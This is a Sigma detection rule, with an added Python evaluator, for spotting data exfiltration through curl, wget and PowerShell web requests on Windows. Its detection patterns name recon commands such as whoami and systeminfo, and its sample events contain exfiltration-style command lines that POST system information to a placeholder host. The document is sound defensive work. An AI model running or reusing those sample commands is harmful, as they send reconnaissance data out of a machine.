Sigma | Level: high | Hunting
Potential Data Exfiltration Activity Via CommandLine Tools
Detects the use of various CLI utilities exfiltrating data via web requests
Detection Query

    selection_iwr:
        Image|endswith:
            - \powershell_ise.exe
            - \powershell.exe
            - \pwsh.exe
            - \cmd.exe
        CommandLine|contains:
            - "curl "
            - Invoke-RestMethod
            - Invoke-WebRequest
            - "irm "
            - "iwr "
            - "wget "
        CommandLine|contains|all:
            - " -ur"
            - " -me"
            - " -b"
            - " POST "
    selection_curl:
        Image|endswith: \curl.exe
        CommandLine|contains: --ur
    selection_curl_data:
        CommandLine|contains:
            - " -d "
            - " --data "
    selection_wget:
        Image|endswith: \wget.exe
        CommandLine|contains:
            - --post-data
            - --post-file
    payloads:
        - CommandLine|re:
            - net\s+view
            - sc\s+query
        - CommandLine|contains:
            - Get-Content
            - GetBytes
            - hostname
            - ifconfig
            - ipconfig
            - netstat
            - nltest
            - qprocess
            - systeminfo
            - tasklist
            - ToBase64String
            - whoami
        - CommandLine|contains|all:
            - "type "
            - " > "
            - " C:\\"
    condition: (selection_iwr or all of selection_curl* or selection_wget) and payloads
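As an added example (not part of the rule or the Sigma project), the condition above transcribed into a small Python evaluator and run over constructed process-creation events. It assumes Sigma's `contains` and `endswith` modifiers match case-insensitively and that `re` is a case-sensitive regex search; note how `all of selection_curl*` requires both the `--ur` flag and a data flag, so a curl download that merely mentions a payload keyword does not fire.

```python
import re

# Rule logic transcribed from the Sigma rule above. Assumption: contains/endswith
# are case-insensitive (inputs are lowercased), while |re is case-sensitive.
IWR_IMAGES = ("\\powershell_ise.exe", "\\powershell.exe", "\\pwsh.exe", "\\cmd.exe")
IWR_TOOLS = ("curl ", "invoke-restmethod", "invoke-webrequest", "irm ", "iwr ", "wget ")
IWR_FLAGS = (" -ur", " -me", " -b", " post ")          # -uri, -method, -body, POST
CURL_DATA = (" -d ", " --data ")
WGET_FLAGS = ("--post-data", "--post-file")
PAYLOAD_RE = (r"net\s+view", r"sc\s+query")
PAYLOAD_STR = ("get-content", "getbytes", "hostname", "ifconfig", "ipconfig", "netstat",
               "nltest", "qprocess", "systeminfo", "tasklist", "tobase64string", "whoami")
PAYLOAD_ALL = ("type ", " > ", " c:\\")

def contains_any(s, needles): return any(n in s for n in needles)
def contains_all(s, needles): return all(n in s for n in needles)

def matches(image: str, cmdline: str) -> bool:
    """Return True when one process-creation event satisfies the rule condition."""
    img, cmd = image.lower(), cmdline.lower()
    selection_iwr = (img.endswith(IWR_IMAGES) and contains_any(cmd, IWR_TOOLS)
                     and contains_all(cmd, IWR_FLAGS))
    # 'all of selection_curl*' == selection_curl AND selection_curl_data
    selection_curl = img.endswith("\\curl.exe") and "--ur" in cmd
    selection_curl_data = contains_any(cmd, CURL_DATA)
    selection_wget = img.endswith("\\wget.exe") and contains_any(cmd, WGET_FLAGS)
    payloads = (any(re.search(p, cmdline) for p in PAYLOAD_RE)   # original case
                or contains_any(cmd, PAYLOAD_STR) or contains_all(cmd, PAYLOAD_ALL))
    return (selection_iwr or (selection_curl and selection_curl_data) or selection_wget) and payloads

PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
CURL = "C:\\Windows\\System32\\curl.exe"
SAMPLE_EVENTS = [  # constructed (Image, CommandLine) pairs, not real telemetry
    (PS, 'powershell.exe -c "Invoke-WebRequest -Uri http://example.invalid/up -Method POST -Body (systeminfo)"'),
    (PS, 'powershell.exe -c "Invoke-WebRequest -Uri http://example.invalid/ -Method GET"'),
    (CURL, "curl.exe --url http://example.invalid/collect -d @C:\\Temp\\tasklist.txt"),
    (CURL, "curl.exe --url http://example.invalid/ -o whoami.txt"),   # payload word, no data flag
    (PS, 'powershell.exe -c "irm -Uri http://example.invalid/ -Method POST -Body (net  view)"'),
]

def evaluate(events):
    """Evaluate the rule over a list of (Image, CommandLine) events."""
    return [matches(img, cmd) for img, cmd in events]

if __name__ == "__main__":
    for (img, cmd), hit in zip(SAMPLE_EVENTS, evaluate(SAMPLE_EVENTS)):
        print("ALERT " if hit else "      ", cmd)
```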
Author: Nasreddine Bencherchali (Nextron Systems)
Created: 2022-08-02
Data Sources: Windows / Process Creation Events
Platforms: windows
Tags: attack.execution, attack.t1059.001
Raw Content
    title: Potential Data Exfiltration Activity Via CommandLine Tools
    id: 7d1aaf3d-4304-425c-b7c3-162055e0b3ab
    status: test
    description: Detects the use of various CLI utilities exfiltrating data via web requests
    references:
        - https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/
    author: Nasreddine Bencherchali (Nextron Systems)
    date: 2022-08-02
    modified: 2025-10-19
    tags:
        - attack.execution
        - attack.t1059.001
    logsource:
        category: process_creation
        product: windows
    detection:
        selection_iwr:
            Image|endswith:
                - '\powershell_ise.exe'
                - '\powershell.exe'
                - '\pwsh.exe'
                - '\cmd.exe'
            CommandLine|contains:
                - 'curl '
                - 'Invoke-RestMethod'
                - 'Invoke-WebRequest'
                - 'irm '
                - 'iwr '
                - 'wget '
            CommandLine|contains|all:
                - ' -ur' # Shortest possible version of the -uri flag
                - ' -me' # Shortest possible version of the -method flag
                - ' -b'
                - ' POST '
        selection_curl:
            Image|endswith: '\curl.exe'
            CommandLine|contains: '--ur' # Shortest possible version of the --uri flag
        selection_curl_data:
            CommandLine|contains:
                - ' -d ' # Shortest possible version of the --data flag
                - ' --data '
        selection_wget:
            Image|endswith: '\wget.exe'
            CommandLine|contains:
                - '--post-data'
                - '--post-file'
        payloads:
            - CommandLine|re:
                - 'net\s+view'
                - 'sc\s+query'
            - CommandLine|contains:
                - 'Get-Content'
                - 'GetBytes'
                - 'hostname'
                - 'ifconfig'
                - 'ipconfig'
                - 'netstat'
                - 'nltest'
                - 'qprocess'
                - 'systeminfo'
                - 'tasklist'
                - 'ToBase64String'
                - 'whoami'
            - CommandLine|contains|all:
                - 'type '
                - ' > '
                - ' C:\'
        condition: (selection_iwr or all of selection_curl* or selection_wget) and payloads
    falsepositives:
        - Unlikely
    level: high